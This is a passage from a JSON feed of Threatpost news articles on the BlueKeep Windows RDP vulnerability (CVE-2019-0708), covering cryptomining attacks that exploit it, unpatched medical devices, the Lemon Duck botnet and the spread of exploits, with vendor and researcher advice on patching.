worm from computer to computer, including nearly 1 million endpoints connected to the Internet of Things (IoT).\n\nSo far, BlueKeep has not lived up to this promise, nor has the vulnerability surfaced in the form of a worm. Instead, initial attacks install a cryptocurrency miner on an infected system, using processing power to generate cryptocurrency, [according to reports](<https://www.wired.com/story/bluekeep-hacking-cryptocurrency-mining/>).\n\n\n\nMoreover, instead of a worm that moves automatically and spreads quickly, attackers instead leveraged the vulnerability\u2019s connective capability to scan the Internet for vulnerable machines to exploit, researchers said.\n\nBritish cybersecurity expert Kevin Beaumont [Tweeted](<https://twitter.com/GossiTheDog/status/1190654984553205761>) about the first wave of attacks Sunday after noticed that a series of Remote Desktop Protocol (RDP) honeypots\u2014or machines set up as malware bait to help researchers detect and analyze outbreaks\u2014started simultaneously crashing.\n\nBeaumont alerted Kryptos Logic security researcher Marcus Hutchins, who analyzed the \u201ccrash dump\u201d and verified BlueKeep activity. \u201cAfter some investigation I found BlueKeep artifacts in memory and shellcode to drop a Monero Miner,\u201d Hutchins, who assumes the username MalwareTech, [Tweeted](<https://twitter.com/MalwareTechBlog/status/1190730471321112577>).\n\nHutchins is known as the researcher who finally found the way to kill the 2017 WannaCry ransomware outbreak, which infected more than 200,000 machines in 150 countries, caused billions of dollars in damages, and hamstrung global business. He later [pleaded guilty](<https://threatpost.com/wannacry-hero-pleads-guilty-to-kronos-malware-charges/143997/>) to charges related to the creation of the Kronos malware.\n\nResearchers first [revealed BlueKeep](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) and its potentially catastrophic power in May, after Microsoft patched it as part of its Patch Tuesday update that month. The vulnerability was identified as a critical remote code-execution flaw in Remote Desktop Services impacting older versions of Windows, including Windows 7, Windows XP, Server 2003 and Server 2008.\n\nMicrosoft issued a [stern warning](<https://msrc-blog.microsoft.com/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>) to users to patch vulnerable systems at the time, noting BlueKeep\u2019s potential to wreak as much havoc as WannaCry.\n\nIndeed, a number of [proof-of-concept exploits](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>) followed the discovery of the vulnerability, one showing a doomsday scenario in which an attacker took complete control of someone\u2019s machine in a mere 22 seconds.\n\nOther exploits followed, including [one developed](<https://threatpost.com/working-bluekeep-exploit-developed-by-dhs/145784/>) by the Department of Homeland Security that took advantage of the vulnerability on a Windows 2000 machine\u2014a version of the OS not included in Microsoft\u2019s original alert.\n\nFortunately, the first attacks exploiting BlueKeep show none of the vulnerability\u2019s destructive potential\u2013but this doesn\u2019t mean security administrators can rest easy just yet. This lackluster initial performance could represent more the unsophistication of the hackers than the nature of the vulnerability itself, observers noted.\n\n\u201cFeel sorry for the [#bluekeep](<https://twitter.com/hashtag/bluekeep?src=hashtag_click>) malware authors: Imagine if cryptomining was the best thing you could come up with,\u201d a computer emergency response team (CERT) employee at a public finanical instution called James Attack [Tweeted](<https://twitter.com/JamesAtack/status/1191264112522792960>), along with a meme of celebrity musician Taylor Swift gesturing the letter \u201cL\u201d on her forehead for \u201closer.\u201d\n\nIndeed, as security researchers already have demonstrated BlueKeep\u2019s potential, it\u2019s only a matter of time before someone with bad intentions cracks the code and exploits the vulnerability to its full potential now that the attack floodgates are open.\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join an expert from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "modified": "2019-11-04T11:24:08", "published": "2019-11-04T11:24:08", "id": "THREATPOST:9599D75F1FEDE69B587F551FF63C7C77", "href": "https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/", "type": "threatpost", "title": "BlueKeep Attacks Have Arrived, Are Initially Underwhelming", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-09T22:36:33", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "While Microsoft issued patches for the [infamous BlueKeep vulnerability](<https://threatpost.com/fearing-wannacry-level-danger-enterprises-wrestle-with-bluekeep/146727/>) almost a year ago, researchers warn that almost half of connected medical devices in hospitals run on outdated Windows versions that are still vulnerable to the remote desktop protocol (RDP) flaw.\n\nResearchers said they found that 22 percent of a typical hospital\u2019s Windows devices were vulnerable to BlueKeep. Even worse, the number of connected medical devices running Windows that are vulnerable to BlueKeep is considerably higher \u2014 around 45 percent, they said. Vulnerable medical devices can include MRIs, ultrasounds, X-rays, and more, which run on operating systems \u2014 typically Windows \u2013 allowing their operators to more easily collect and upload data.\n\n\u201cFor hospitals, the task of monitoring vulnerabilities, identifying affected devices, chasing down suitable patches, and distributing those patches across a sprawling campus is tedious, to say the least,\u201d said researchers with CyberMDX in their [\u201c2020 Vision\u201d report on medical security](<https://www.cybermdx.com/hubfs/Downloadable%20Assets/2020%20Vision%20-%20A%20Review%20of%20Major%20IT%20&%20Cybersecurity%20Issues%20Affecting%20Healthcare_03.pdf?utm_source=hs_automation&utm_medium=email&utm_content=83601713&_hsenc=p2ANqtz-8LB8KZilre2-wOeS6fwp0EuTQ8bkZ8OabcwLXVVXks7psugIMYqyK69oRYFSdkRq2TGPzBLk3aWZ-UP3RdRdkidFD7zK5E4cEcDDhLW_2GPQxDsm0&_hsmi=83601713>), released Tuesday. \u201cThis process is slow and inefficient, as the hospitals usually do not know which devices or security issues to attend to first.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe BlueKeep flaw ([CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>)) was fixed during Microsoft\u2019s [May 2019 Patch Tuesday](<https://threatpost.com/microsoft-patches-zero-day/144742/>) Security Bulletin. System administrators were urged to immediately deploy fixes as the flaw could pave the way for a similar rapidly-propagating attack on the [scale of WannaCry](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>). In the months following the disclosure of BlueKeep, researchers tracked a [spike in scans for vulnerable systems](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) and eventually [active attacks exploiting the flaw](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>).\n\nAlmost a year later, researchers have found that an alarming number of connected medical devices remain vulnerable to BlueKeep. The wormable implications of BlueKeep on medical devices are particularly concerning due to the hit that many hospitals took after attackers launched the [2017 WannaCry attack](<https://threatpost.com/leaked-nsa-exploit-spreading-ransomware-worldwide/125654/>), interrupting several critical services at hospitals across England.\n\nBeyond BlueKeep, outdated Windows versions are also exposing medical devices to an array of other vulnerabilities. For instance, up to 11 percent of connected medical devices are exposed to [DejaBlue](<https://threatpost.com/cisco-patches-six-critical-bugs/147585/>), a set of RDP flaws affecting Windows 7, Windows 8.1, and Windows 10 (as well as Windows Server 2008, Windows Server 2012, Windows Server 2016, and Windows Server 2019).\n\n## Medical Security Issues\n\nSo why haven\u2019t organizations updated their medical devices? This is due to a variety of reasons. Patch management, for one, is a big issue for hospitals. Researchers said that four months after a major vulnerability is disclosed, most hospitals will still not have patched more than 40 percent of their vulnerable devices.\n\nAccording to [previous CyberMDX research](<https://www.cybermdx.com/hubfs/Downloadable%20Assets/Clinical%20Connectivity%20Just%20the%20Facts.pdf?utm_source=hs_automation&utm_medium=email&utm_content=83092762&_hsenc=p2ANqtz--TX7BUvCUeXCs9gsaE02MUWeIzq19fY9l_6QNlrBUzDk3z95KxoqOtUK5Wv_fKxpu1OnstOR9UD7p1K99vW_onsXCua1uUwHXCYGM9pnVN2LhVX3M&_hsmi=83092762>), 80 percent of device manufacturers and healthcare orgs report that medical devices are \u201cvery difficult to secure,\u201d citing a lack of knowledge and training on secure coding practices, and pressure on development teams to meet product deadlines. The study also pointed to a lack of quality assurance and testing procedures for medical devices, which lead to more vulnerabilities slipping by when products go to market. In fact, nearly one in three organizations surveyed by CyberMDX said that they never audit their medical devices for known vulnerabilities.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/02/19133850/medical-device-connected.png>)\n\nThat\u2019s no surprise to Charles Ragland, security engineer at Digital Shadows, who worked in emergency rooms and on ambulances as a paramedic for 10 years. During that time, he witnessed outdated medical devices first hand, including cardiac catheterization lab systems running on Windows Server 2003.\n\n\u201cWith the level of complexity that involves managing networks with vast amounts of connected devices, it is not surprising that many of these devices have slipped through the cracks and remain vulnerable to threats such as BlueKeep,\u201d Ragland told Threatpost. \u201cAs always, the most effective risk mitigation techniques involve turning off unnecessary services, implementing network level authentication [for RDP], blocking access to sensitive ports, and ensuring timely security updates.\u201d\n\nChris Morales, head of security analytics at Vectra, told Threatpost that part of the problem also stems from a lack of accountability on the manufacturer, as devices are often brought in by medical staff and no one bothers to inform IT or security.\n\n\u201cMost medical devices are not updated as they serve a specific lifesaving function,\u201d he told Threatpost. \u201cWhile an OS update might seem benign, any interruption with the functioning of a medical device could have serious implications. Now this isn\u2019t a total excuse for not updating. Manufacturers need update testing processes that enable to have a timeline for validation and updating.\u201d\n\nMedical devices continue to be discovered riddled with vulnerabilities. Earlier this month, [Medtronic released updates](<https://threatpost.com/medtronic-patches-implanted-device-carelink/152533/>) to address known vulnerabilities in its line of connected medical devices that were initially disclosed last year and in 2018. In January, [researchers found six vulnerabilities](<https://threatpost.com/critical-mdhex-bugs-ge-medical-devices/152163/>) in a range of GE Healthcare devices for hospitals, which could allow attackers to disable the devices, harvest personal health information (PHI), change alarm settings and alter device functionality. In 2019, the Food and Drug Administration (FDA) [issued an emergency alert](<https://threatpost.com/fda-warns-of-potentially-fatal-flaws-in-medtronic-insulin-pumps/146109/>), warning that Medtronic MiniMed insulin pumps are vulnerable to potentially life-threatening cyberattacks.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/02/19151849/hospitals.png>)\n\nThese security issues are leading to real-life attacks. In 2019, for instance, hospitals reported security incidents, from a server misconfiguration exposing data of 973,024 patients at UW Medicine, to phishing attacks compromising data at UConn Health and Oregon Department of Human Services; all the way up to full fledged ransomware attacks at the Columbia Surgical Specialist of Spokane, Sarrell Dental and Hospital Pavia Hato Rey.\n\nThomas Hatch, CTO and Co-Founder at SaltStack, told Threatpost that the security issues that the healthcare industry faces \u201cis a tip of the iceberg problem, where the real vulnerabilities are much more vast than what we can even see.\u201d\n\n\u201cIoT devices are notorious for being difficult to patch,\u201d he told Threatpost. \u201cThe systems built around them are designed for, in this case, hospital medical staff, not maintenance. IoT devices get built for the target use case which makes them difficult to maintain because a single doctors\u2019 office can be using many dramatically different devices; an entire hospital is even worse.\u201d\n", "modified": "2020-02-19T20:29:59", "published": "2020-02-19T20:29:59", "id": "THREATPOST:902F021868A194A6F02A30F8709AA730", "href": "https://threatpost.com/bluekeep-flaw-plagues-medical-devices/153029/", "type": "threatpost", "title": "BlueKeep Flaw Plagues Outdated Connected Medical Devices", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-13T20:42:53", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "Researchers are warning of a recent dramatic uptick in the activity of the Lemon Duck cryptocurrency-mining botnet, which targets victims\u2019 computer resources to mine the Monero virtual currency.\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\nResearchers warn that Lemon Duck is \u201cone of the more complex\u201d mining botnets, with several interesting tricks up its sleeve. While the botnet has been active since at least the end of December 2018, researchers observed an increase in DNS requests connected with its command-and-control (C2) and mining servers since the end of August, in a slew of attacks centered on Asia (including ones targeting Iran, Egypt, Philippines, Vietnam and India).\n\n\u201cCisco Talos has identified activity in our endpoint telemetry associated with Lemon Duck cryptocurrency mining malware, affecting three different companies in the government, retail, and technology sectors,\u201d said researchers with Cisco Talos, in [Tuesday research](<https://blog.talosintelligence.com/2020/10/lemon-duck-brings-cryptocurrency-miners.html>). \u201cWe observed the activity spanning from late March 2020 to present.\u201d\n\nMore recent attacks have included less-documented modules that are loaded by the main PowerShell component \u2013 including a Linux branch and a module allowing further spread by sending [emails to victims with COVID-19 lures](<https://threatpost.com/cyberattackers-1-5m-covid-19-emails-per-day/154970/>).\n\nThreatpost has reached out to researchers for further information about how many victims have been targeted and the extent to which the botnet\u2019s operators have profited off of the cryptomining attacks.\n\n## **Lemon Duck**\n\nLemon Duck has at least 12 independent infection vectors \u2013 more than most malware. These capabilities range from Server Message Block (SMB) and Remote Desktop Protocol (RDP) password brute-forcing, sending emails with exploit attachments or targeting the [RDP BlueKeep flaw](<https://threatpost.com/critical-microsoft-remote-desktop-flaw-fixed-in-security-update/148982/>) (CVE-2019-0708) in Windows machines; or targeting vulnerabilities in Redis (an open-source, in-memory data structure store used as a database, cache and message broker) and YARN Hadoop (a resource-management and job-scheduling technology) in Linux machines.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/13155059/image18.jpg>)\n\nLemon Duck botnet August activity. Credit: Cisco Talos\n\nAfter the initial infection, a PowerShell loading script is downloaded, which utilizes the function \u201cbpu\u201d to disable Windows Defender real-time detection and put powershell.exe on the list of processes excluded from scanning.\n\n\u201cbpu\u201d also checks if the script is running with administrative privileges. If it is, the payload is downloaded and run using the Invoke-Expression cmdlet (a function that can be utilized for calling code within a script or building commands to be executed later). If not, it leverages existing system executables to launch the next stage.\n\n\u201cThis is a good starting point for analysis and retrieval of additional modules,\u201d said researchers. \u201cAlmost all PowerShell modules are obfuscated with four or five layers of obfuscation, likely generated by the Invoke-Obfuscation module. Although they are relatively easy to remove, they still slow down the analysis process and make detection using regular signatures more difficult.\u201d\n\nThese executable modules, which are downloaded and driven by the main module, communicates with the C2 server over HTTP.\n\n## **Modular Functionalities**\n\nThe modules include a main loader, which checks the level of user privileges and components relevant for mining, such as the type of the available graphic card (including GTX, [Nvidia](<https://threatpost.com/nvidia-windows-gamers-graphics-driver-bugs/156911/>), [GeForce](<https://threatpost.com/nvidia-geforce-experience-bug/143196/>), [AMD](<https://threatpost.com/amd-downplays-cpu-threat-opening-chips-to-data-leak-attacks/153516/>) and [Radeon](<https://threatpost.com/amd-radeon-cards-vmware-workstations/148406/>)). If these GPUs are not detected, the loader downloads and runs the commodity XMRig CPU-based mining script.\n\nOther modules include a main spreading module (with what researchers say include \u201ca rather ambitious piece of code\u201d containing more than 10,000 lines of coding), a Python-based module packaged using Pyinstaller, and a killer module designed to disable known competing mining botnets.\n\nLemon Duck also includes an email-spreading module. These spread emails using a mix of COVID-19-related subject lines and text, as well as other emotion-driven lures (such as an email subject \u201cWTF\u201d with the text \u201cWhat\u2019s wrong with you?are you out of your mind!!!!!!!\u201d). These emails contain an infected attachments sent using Outlook automation to every contact in the affected user\u2019s address book.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/13160429/image15.png>)\n\nAn example of an email sent by the Lemon Duck module. Credit: Cisco Talos\n\n## **Linux Branch**\n\nResearchers also shed light on a less documented Linux branch of the Lemon Duck malware. These Lemon Duck bash scripts are executed after the attacker successful compromises a Linux host (via Redis, YARN or SSH). There are two main bash scripts, said researchers: The first collects some data about the infected host and attempts to download a Linux version of the XMRig miner, before attempting to delete various system logs. The second attempts to terminate and remove competing cryptocurrency miners already present on the system.\n\n\u201cThe script also attempts to terminate and uninstall processes related to Alibaba and Tencent cloud security agents. The script seems to be shared between several Linux-based cryptomining botnets,\u201d said researchers.\n\nLemon Duck was previously spotted in 2020 in a campaign targeting printers, smart TVs and automated guided vehicles that depend on Windows 7. [Researchers in February warned that](<https://threatpost.com/lemon-duck-malware-targets-iot/152596/>) the processor-intensive mining efforts are taking their toll on gear and triggering equipment malfunctions along with exposing devices to safety issues, disruption of supply chains and data loss.\n\nDefenders can stomp out the threat of cryptocurrency attacks by monitoring system behavior to spot any resource-sucking threats.\n\n\u201cCryptocurrency-mining botnets can be costly in terms of the stolen computing cycles and power consumption costs,\u201d they said. \u201cWhile organizations need to be focused on protecting their most valuable assets, they should not ignore threats that are not particularly targeted toward their infrastructure.\u201d\n\n** [On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. [Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar.**\n", "modified": "2020-10-13T20:41:52", "published": "2020-10-13T20:41:52", "id": "THREATPOST:78996437466E037C7F29EFB1FFBBAB42", "href": "https://threatpost.com/lemon-duck-cryptocurrency-botnet/160046/", "type": "threatpost", "title": "Lemon Duck Cryptocurrency-Mining Botnet Activity Spikes", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-11T11:46:30", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "One million devices are still vulnerable to BlueKeep, a critical Microsoft bug with \u201cwormable\u201d capabilities, almost two weeks after a patch was released.\n\nThe flaw ([CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>)) was fixed during Microsoft\u2019s [May Patch Tuesday](<https://threatpost.com/microsoft-patches-zero-day/144742/>) Security Bulletin earlier this month. System administrators were urged to immediately deploy fixes as the flaw could pave the way for a similar rapidly-propogating attack on the [scale of WannaCry](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>).\n\nDespite that, researchers on Tuesday warned that one million devices linked to the public internet are still vulnerable to the bug. Making matters worse, a spike in scans for vulnerable systems was[ spotted over the weekend](<https://twitter.com/GreyNoiseIO/status/1132101252006010880>) \u2013 potentially indicating that bad actors are looking to sniff out the activity.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThat means when the worm hits, it\u2019ll likely compromise those million devices,\u201d said Robert Graham, researcher with Errata Security in a [Tuesday analysis](<https://blog.erratasec.com/2019/05/almost-one-million-vulnerable-to.html#.XO0rtS-ZPdd>). \u201cThis will likely lead to an event as damaging as WannaCry and notPetya from 2017 \u2013 potentially worse, as hackers have since honed their skills exploiting these things for ransomware and other nastiness.\u201d\n\n## BlueKeep\n\nThe critical remote code-execution flaw exists in Remote Desktop Services and impacts older version of Windows, including Windows 7, Windows XP, Server 2003 and Server 2008 (Microsoft deployed patches to Windows XP and Windows 2003 for the bug during Patch Tuesday, neither of which is still supported via monthly Patch Tuesday updates).\n\n\u201cBlueKeep\u201d has worried the infosec community because researchers describe it as a \u201cwormable\u201d flaw, similar to the EternalBlue exploit that was used by a rapidly-moving malware [attacks in 2017 like WannaCry](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>) or NotPetya.\n\n\u201cThis [bug] would have the potential of a global WannaCry-level event,\u201d said Chris Goettl, director of product management for security at Ivanti, during Patch Tuesday. \u201cWhat\u2019s more, Microsoft has released updates for Windows XP and Server 2003 (which you wouldn\u2019t have found unless you were looking at the Windows Update Catalog). So, this affects Windows 7, Server 2008 R2, XP and Server 2003.\u201d\n\n## Vulnerable Devices\n\nWhile Microsoft urged administrators to update impacted Windows systems as soon as possible, researchers said as recently as Tuesday that one million devices remain vulnerable to BlueKeep.\n\nErrata Security\u2019s Graham conducted a scan using his [Masscan](<https://github.com/robertdavidgraham/masscan>) Internet-scale port scanner (which searches for open ports) to look for the port (3389) used by Remote Desktop. This pinpointed all open ports \u2013 from there, in order to discover whether or not they were vulnerable, Graham used a Remote Desktop Protocol scanning project developed by [the Shadowserver Foundation](<https://rdpscan.shadowserver.org/>). From there, he found that almost one million devices both reliably talk to the Remote Desktop protocol and are vulnerable to BlueKeep.\n\n\u201cThe upshot is that these tests confirm that roughly 950,000 machines are on the public Internet that are vulnerable to this bug,\u201d said Graham. \u201cHackers are likely to figure out a robust exploit in the next month or two and cause havoc with these machines.\u201d\n\nIn the meantime, vendors are coming out with their own advisories for vulnerable devices.\n\nSeveral impacted devices include Siemens devices used in the medical space \u2013 including [radiation oncology](<https://cert-portal.siemens.com/productcert/pdf/ssa-433987.pdf>) products, [laboratory diagnostics](<https://cert-portal.siemens.com/productcert/txt/ssa-832947.txt>) products, [Radiography and Mobile X-ray](<https://cert-portal.siemens.com/productcert/pdf/ssa-932041.pdf>) products and [point of care diagnostics](<https://cert-portal.siemens.com/productcert/pdf/ssa-616199.pdf>) products.\n\n\u201cSome of these Siemens Healthineers products are affected by this vulnerability,\u201d said Siemens [in an advisory](<https://cert-portal.siemens.com/productcert/pdf/ssb-501863.pdf>). \u201cDepending on the target system and intent of the attacker, a successful exploit could result in data corruption and potential harm for patients and/or the environment.\u201d\n\nSiemens medical products, under its \u201cHealthineers\u201d line, were also hit by the [WannaCry ransomware](<https://threatpost.com/patches-pending-for-medical-devices-hit-by-wannacry/125758/>) in 2017. Seimens said it has scheduled some patches for these products in June, but for the most part suggested that end users disabled Remote Desktop Protocol.\n\n## Increase in Scans** **\n\nThreat actors are also actively sniffing out vulnerable devices. Researchers with GreyNoise over the weekend said that they are \u201cobserving sweeping tests for systems vulnerable to the RDP \u2018BlueKeep\u2019 (CVE-2019-0708) vulnerability from several dozen hosts around the Internet.\u201d\n\n> GreyNoise is observing sweeping tests for systems vulnerable to the RDP \"BlueKeep\" (CVE-2019-0708) vulnerability from several dozen hosts around the Internet. This activity has been observed from exclusively Tor exit nodes and is likely being executed by a single actor. [pic.twitter.com/iGwuGuD4Rq](<https://t.co/iGwuGuD4Rq>)\n> \n> \u2014 GreyNoise Intelligence (@GreyNoiseIO) [May 25, 2019](<https://twitter.com/GreyNoiseIO/status/1132101252006010880?ref_src=twsrc%5Etfw>)\n\nThe activity is likely being executed by a single actor, they said.\n\n\u201cThe reason we think it\u2019s one actor is because all connections that we\u2019re seeing are originating from Tor, and all of them are using the same scanner code, which we\u2019ve developed a fingerprint for,\u201d Andrew Morris, with GreyNoise, told Threatpost. \u201cWe don\u2019t necessarily know that the actor is malicious. This is simply based on the fact that they are coming out of Tor nodes exclusively and not coming from a known-legitimate mass scanner service like Shodan.\u201d\n\nResearchers for their part said that there are several steps that end users can take to protect themselves, but the very first is \u201cto apply Microsoft\u2019s patches, including old Windows XP, Windows Vista, and Windows 7 desktops and servers,\u201d said Graham.\n\n**_Want to know more about Identity Management and navigating the shift beyond passwords? Don\u2019t miss _**[**_our Threatpost webinar on May 29 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/8039101655437489665?source=ART>)**_. Join Threatpost editor Tom Spring and a panel of experts as they discuss how cloud, mobility and digital transformation are accelerating the adoption of new Identity Management solutions. Experts discuss the impact of millions of new digital devices (and things) requesting access to managed networks and the challenges that follow._**\n", "modified": "2019-05-28T14:39:54", "published": "2019-05-28T14:39:54", "id": "THREATPOST:4F23E34A058045723339C103BC41A3D1", "href": "https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/", "type": "threatpost", "title": "One Million Devices Open to Wormable Microsoft BlueKeep Flaw", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-11T11:41:37", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "The nightmare vision of a \u201cmega-worm\u201d global BlueKeep infection could be closer to becoming reality as working exploits are now becoming available to the public, and there\u2019s evidence that adversaries are actively scanning for the vulnerability.\n\nResearchers weighed in with Threatpost about how enterprises can thwart the critical Windows remote code-execution (RCE) vulnerability, even if immediate patching is too large an ask.\n\n## Exploits Make an Appearance\n\nBy way of background, the BlueKeep vulnerability (CVE-2019-0708) RCE flaw exists in Remote Desktop Services and impacts older version of Windows, including Windows 7, Windows XP, Server 2003, Server 2008 and Server 2008 R2. The main thing that sets BlueKeep apart is the fact that it\u2019s wormable \u2013 and so it can self-propagate from machine to machine, setting up the scene for a WannaCry-level, fast-moving infection wave.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cBlueKeep is a use-after-free vulnerability, meaning that the program tries to use memory after it is supposed to have discarded it,\u201d according to a [May analysis](<https://news.sophos.com/en-us/2019/05/14/may-2019-patch-tuesday-addresses-critical-remote-desktop-dhcp-bugs/>) from security firm Sophos. \u201cThe vulnerability lies in termdd.sys, which is the RDP kernel driver. A user can exploit this by opening an RDP connection to a remote computer called a channel \u2013 in this case a default RDP channel called MS_T210 \u2013 and sending specially crafted data to it.\u201d\n\nSecurity researchers have said that creating an exploit has been difficult, often leading to crashing and DoSing the target machine rather than RCE. However, some [have been able to create](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>) working exploits (including the [Department of Homeland Security](<https://threatpost.com/working-bluekeep-exploit-developed-by-dhs/145784/>)), but have kept mum on the details in order to protect the public.\n\nThat changed last week when an exploit went up for sale via a security firm that would allow an attacker to run code remotely on the compromised machine and then create a worm that uses RDP to exploit other machines without any human interaction.\n\nImmunity Inc. said via Twitter that it has added a working BlueKeep exploit module to its CANVAS automated exploitation platform, which is available as a subscription (albeit for an expensive monthly rate):\n\n> New Release \u2013 CANVAS 7.23: This release features a new module for the RDP exploit, BLUEKEEP. Check out our video demonstration here: <https://t.co/azCuJp1osI> [#bluekeep](<https://twitter.com/hashtag/bluekeep?src=hash&ref_src=twsrc%5Etfw>) [#cve20190708](<https://twitter.com/hashtag/cve20190708?src=hash&ref_src=twsrc%5Etfw>) [#exploit](<https://twitter.com/hashtag/exploit?src=hash&ref_src=twsrc%5Etfw>)\n> \n> \u2014 Immunity Inc. (@Immunityinc) [July 23, 2019](<https://twitter.com/Immunityinc/status/1153752470130221057?ref_src=twsrc%5Etfw>)\n\nDave Aitel, CTI at Immunity\u2019s parent company, Cyxtera, said via email that the company decided to release the exploit because \u2